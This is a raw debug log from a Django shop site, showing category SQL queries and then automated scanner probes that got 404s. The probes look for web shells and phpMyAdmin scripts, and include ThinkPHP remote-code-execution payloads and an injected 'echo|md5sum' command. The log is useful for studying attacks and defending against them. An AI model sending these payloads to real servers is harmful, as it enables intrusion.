"shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:16:19] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 304 0 [07/Dec/2019 14:16:20] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 304 0 DEBUG 2019-12-07 14:18:10,379 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:18:10,387 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:18:10,392 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:18:10,396 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:18:10,400 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:18:10,404 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:18:10,408 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:18:10,412 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:18:10,416 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:18:10,420 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:18:10,424 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:18:10] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 14:20:32,723 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:20:32,731 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:20:32,734 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:20:32,738 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:20:32,742 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:20:32,746 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:20:32,750 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:20:32,754 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:20:32,757 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:20:32,761 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:20:32,765 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:20:32] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-07 14:20:34,121 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 14:20:34,129 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-07 14:20:34,133 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-07 14:20:34,137 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-07 14:20:34,141 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-07 14:20:34,145 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-07 14:20:34,149 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-07 14:20:34,153 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-07 14:20:34,157 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-07 14:20:34,161 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-07 14:20:34,164 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [07/Dec/2019 14:20:34] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [07/Dec/2019 14:20:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:24:26] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 14:24:26,842 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '5vjsr74dwn4uk1mjvofol4ug4hca8y99' LIMIT 1; args=('5vjsr74dwn4uk1mjvofol4ug4hca8y99',) DEBUG 2019-12-07 14:24:26,845 utils 32196 139885061072640 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('5vjsr74dwn4uk1mjvofol4ug4hca8y99', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-21T14:24:26.843025+00:00'::timestamptz); args=('5vjsr74dwn4uk1mjvofol4ug4hca8y99', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 21, 14, 24, 26, 843025, tzinfo=)) [07/Dec/2019 14:24:26] "GET /login/?next=/ HTTP/1.0" 200 1786 [07/Dec/2019 14:25:45] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:30:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:37:37] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:42:40] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:47:42] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:52:45] "GET / HTTP/1.0" 302 0 [07/Dec/2019 14:58:48] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:05:03] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:10:06] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:15:08] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [07/Dec/2019 15:20:11] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:21:35] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:25:14] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:30:17] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:40:14] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:45:21] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:50:24] "GET / HTTP/1.0" 302 0 [07/Dec/2019 15:56:37] "GET / HTTP/1.0" 302 0 Not Found: /proxy.php [07/Dec/2019 16:05:04] "GET /proxy.php HTTP/1.0" 404 6627 [07/Dec/2019 16:06:16] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:11:19] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:16:21] "GET / HTTP/1.0" 302 0 [07/Dec/2019 16:17:16] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [07/Dec/2019 16:17:17] "GET /robots.txt HTTP/1.0" 404 6623 [07/Dec/2019 16:17:20] "GET / HTTP/1.0" 302 0 Not Found: /l.php [07/Dec/2019 16:17:20] "GET /l.php HTTP/1.0" 404 6608 Not Found: /phpinfo.php [07/Dec/2019 16:17:21] "GET /phpinfo.php HTTP/1.0" 404 6626 Not Found: /index.php [07/Dec/2019 16:17:24] "POST /index.php HTTP/1.0" 404 6621 Not Found: /bbs.php [07/Dec/2019 16:17:25] "POST /bbs.php HTTP/1.0" 404 6615 Not Found: /forum.php [07/Dec/2019 16:17:27] "POST /forum.php HTTP/1.0" 404 6621 Not Found: /bbs/index.php [07/Dec/2019 16:17:28] "POST /bbs/index.php HTTP/1.0" 404 6633 Not Found: /forum/index.php [07/Dec/2019 16:17:30] "POST /forum/index.php HTTP/1.0" 404 6639 Not Found: /forums/index.php [07/Dec/2019 16:17:31] "POST /forums/index.php HTTP/1.0" 404 6642 DEBUG 2019-12-07 16:17:31,511 utils 32196 139885061072640 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [07/Dec/2019 16:17:31] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help.php [07/Dec/2019 16:17:33] "GET /help.php HTTP/1.0" 404 6617 Not Found: /java.php [07/Dec/2019 16:17:37] "GET /java.php HTTP/1.0" 404 6617 Not Found: /_query.php [07/Dec/2019 16:17:38] "GET /_query.php HTTP/1.0" 404 6623 Not Found: /db_cts.php [07/Dec/2019 16:17:40] "GET /db_cts.php HTTP/1.0" 404 6623 Not Found: /db_pma.php [07/Dec/2019 16:17:42] "GET /db_pma.php HTTP/1.0" 404 6623 Not Found: /logon.php [07/Dec/2019 16:17:42] "GET /logon.php HTTP/1.0" 404 6620 Not Found: /help-e.php [07/Dec/2019 16:17:43] "GET /help-e.php HTTP/1.0" 404 6623 Not Found: /log.php [07/Dec/2019 16:17:45] "GET /log.php HTTP/1.0" 404 6614 Not Found: /hell.php [07/Dec/2019 16:17:45] "GET /hell.php HTTP/1.0" 404 6617 Not Found: /pmd_online.php [07/Dec/2019 16:17:46] "GET /pmd_online.php HTTP/1.0" 404 6635 Not Found: /shell.php [07/Dec/2019 16:17:48] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /htdocs.php [07/Dec/2019 16:17:49] "GET /htdocs.php HTTP/1.0" 404 6623 Not Found: /b.php [07/Dec/2019 16:17:49] "GET /b.php HTTP/1.0" 404 6608 Not Found: /sane.php [07/Dec/2019 16:17:49] "GET /sane.php HTTP/1.0" 404 6617 Not Found: /desktop.ini.php [07/Dec/2019 16:17:50] "GET /desktop.ini.php HTTP/1.0" 404 6638 Not Found: /z.php [07/Dec/2019 16:17:51] "GET /z.php HTTP/1.0" 404 6608 Not Found: /wpc.php [07/Dec/2019 16:18:00] "GET /wpc.php HTTP/1.0" 404 6614 Not Found: /wpo.php [07/Dec/2019 16:18:00] "GET /wpo.php HTTP/1.0" 404 6614 Not Found: /t6nv.php [07/Dec/2019 16:18:01] "GET /t6nv.php HTTP/1.0" 404 6617 Not Found: /muhstik.php [07/Dec/2019 16:18:04] "GET /muhstik.php HTTP/1.0" 404 6626 Not Found: /text.php [07/Dec/2019 16:18:04] "GET /text.php HTTP/1.0" 404 6617 Not Found: /wp-config.php [07/Dec/2019 16:18:05] "GET /wp-config.php HTTP/1.0" 404 6632 Not Found: /muhstik.php [07/Dec/2019 16:18:08] "GET /muhstik.php HTTP/1.0" 404 6626 Not Found: /muhstik2.php [07/Dec/2019 16:18:08] "GET /muhstik2.php HTTP/1.0" 404 6629 Not Found: /muhstiks.php [07/Dec/2019 16:18:09] "GET /muhstiks.php HTTP/1.0" 404 6629 Not Found: /muhstik-dpr.php [07/Dec/2019 16:18:10] "GET /muhstik-dpr.php HTTP/1.0" 404 6638 Not Found: /lol.php [07/Dec/2019 16:18:12] "GET /lol.php HTTP/1.0" 404 6614 Not Found: /uploader.php [07/Dec/2019 16:18:13] "GET /uploader.php HTTP/1.0" 404 6629 Not Found: /cmd.php [07/Dec/2019 16:18:14] "GET /cmd.php HTTP/1.0" 404 6614 Not Found: /cmv.php [07/Dec/2019 16:18:16] "GET /cmv.php HTTP/1.0" 404 6614 Not Found: /cmdd.php [07/Dec/2019 16:18:17] "GET /cmdd.php HTTP/1.0" 404 6617 Not Found: /knal.php [07/Dec/2019 16:18:17] "GET /knal.php HTTP/1.0" 404 6617 Not Found: /cmd.php [07/Dec/2019 16:18:17] "GET /cmd.php HTTP/1.0" 404 6614 Not Found: /shell.php [07/Dec/2019 16:18:18] "GET /shell.php HTTP/1.0" 404 6620 Not Found: /appserv.php [07/Dec/2019 16:18:18] "GET /appserv.php HTTP/1.0" 404 6626 Not Found: /scripts/setup.php [07/Dec/2019 16:18:19] "GET /scripts/setup.php HTTP/1.0" 404 6644 Not Found: /phpmyadmin/scripts/setup.php [07/Dec/2019 16:18:20] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6677 Not Found: /scripts/db___.init.php [07/Dec/2019 16:18:27] "GET /scripts/db___.init.php HTTP/1.0" 404 6659 Not Found: /phpmyadmin/scripts/db___.init.php [07/Dec/2019 16:18:28] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6692 Not Found: /MyAdmin/scripts/setup.php [07/Dec/2019 16:18:44] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /pma/scripts/db___.init.php [07/Dec/2019 16:18:44] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6671 Not Found: /PMA/scripts/db___.init.php [07/Dec/2019 16:18:45] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6671 Not Found: /MyAdmin/scripts/db___.init.php [07/Dec/2019 16:18:52] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6683 Not Found: /cacti/plugins/weathermap/editor.php [07/Dec/2019 16:18:56] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6698 Not Found: /weathermap/editor.php [07/Dec/2019 16:18:57] "GET /weathermap/editor.php HTTP/1.0" 404 6656 Not Found: /index.php [07/Dec/2019 16:18:58] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6867 Not Found: /elrekt.php [07/Dec/2019 16:19:00] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6870 DEBUG 2019-12-07 16:19:01,019 utils 32196 139885061072640 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) Not Found: /App/ [07/Dec/2019 16:19:01] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 404 1754 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [07/Dec/2019 16:19:01] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6771 Not Found: /index.php [07/Dec/2019 16:19:02] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6676 [07/Dec/2019 16:19:04] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [07/Dec/2019 16:19:04] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-07 16:19:05,005 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [07/Dec/2019 16:19:05] "GET /joomla/ HTTP/1.0" 404 1728 DEBUG 2019-12-07 16:19:05,464 utils 32196 139885061072640 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) Not Found: /Joomla/ [07/Dec/2019 16:19:05] "GET /Joomla/ HTTP/1.0" 404 1728 [07/Dec/2019 16:19:05] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [07/Dec/2019 16:19:06] "GET /d7.php HTTP/1.0" 404 6611 Not Found: /rxr.php [07/Dec/2019 16:19:08] "GET /rxr.php HTTP/1.0" 404 6614 Not Found: /1x.php [07/Dec/2019 16:19:09] "GET /1x.php HTTP/1.0" 404 6611 Not Found: /undx.php [07/Dec/2019 16:19:12] "GET /undx.php HTTP/1.0" 404 6617 Not Found: /spider.php [07/Dec/2019 16:19:13] "GET /spider.php HTTP/1.0" 404 6623 Not Found: /payload.php [07/Dec/2019 16:19:13] "GET /payload.php HTTP/1.0" 404 6626 Not Found: /composers.php [07/Dec/2019 16:19:15] "GET /composers.php HTTP/1.0" 404 6632 Not Found: /izom.php [07/Dec/2019 16:19:17] "GET /izom.php HTTP/1.0" 404 6617 Not Found: /composer.php [07/Dec/2019 16:19:18] "GET /composer.php HTTP/1.0" 404 6629 Not Found: /hue2.php [07/Dec/2019 16:19:18] "GET /hue2.php HTTP/1.0" 404 6617 Not Found: /lang.php [07/Dec/2019 16:19:21] "GET /lang.php?f=1 HTTP/1.0" 404 6621 Not Found: /izom.php [07/Dec/2019 16:19:22] "GET /izom.php HTTP/1.0" 404 6617 Not Found: /payload.php [07/Dec/2019 16:19:22] "GET /payload.php HTTP/1.0" 404 6626 Not Found: /new_license.php [07/Dec/2019 16:19:24] "GET /new_license.php HTTP/1.0" 404 6638 Not Found: /images/!.php [07/Dec/2019 16:19:25] "GET /images/!.php HTTP/1.0" 404 6629 Not Found: /images/vuln.php [07/Dec/2019 16:19:26] "GET /images/vuln.php HTTP/1.0" 404 6638 Not Found: /hd.php [07/Dec/2019 16:19:26] "GET /hd.php HTTP/1.0" 404 6611 Not Found: /laravel.php [07/Dec/2019 16:19:52] "GET /laravel.php HTTP/1.0" 404 6626 Not Found: /huoshan.php [07/Dec/2019 16:19:52] "GET /huoshan.php HTTP/1.0" 404 6626 Not Found: /doudou.php [07/Dec/2019 16:20:08] "GET /doudou.php HTTP/1.0" 404 6623 Not Found: /mjx.php [07/Dec/2019 16:20:09] "GET /mjx.php HTTP/1.0" 404 6614 Not Found: /xiaoxia.php [07/Dec/2019 16:20:09] "GET /xiaoxia.php 